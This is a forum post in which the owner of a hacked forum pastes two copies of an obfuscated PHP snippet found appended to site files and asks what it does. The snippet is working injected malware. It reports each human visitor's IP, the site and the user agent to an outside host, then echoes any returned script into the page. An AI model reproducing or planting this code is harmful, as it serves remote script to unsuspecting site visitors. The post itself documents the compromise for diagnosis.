2014-01-26, 05:26 AM
I already overwrite and re-install my forum and change all passwords... but I want to know what happened... this is the code that some pho files had at the end:
Another example:
?>
<?php
#29942a#
error_reporting(0); ini_set('display_errors',0); $wp_rmap1999 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_rmap1999) && !preg_match ('/bot/i', $wp_rmap1999))){
$wp_rmap091999="http://"."template"."align".".com/align"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_rmap1999);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_rmap091999);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1999rmap = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1999rmap,1,3) === 'scr' ){ echo $wp_1999rmap; }
#/29942a#
?>
Another example:
<?php
#bf73aa#
error_reporting(0); ini_set('display_errors',0); $wp_rmap1999 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_rmap1999) && !preg_match ('/bot/i', $wp_rmap1999))){
$wp_rmap091999="http://"."template"."align".".com/align"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_rmap1999);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_rmap091999);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1999rmap = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1999rmap,1,3) === 'scr' ){ echo $wp_1999rmap; }
#/bf73aa#
?>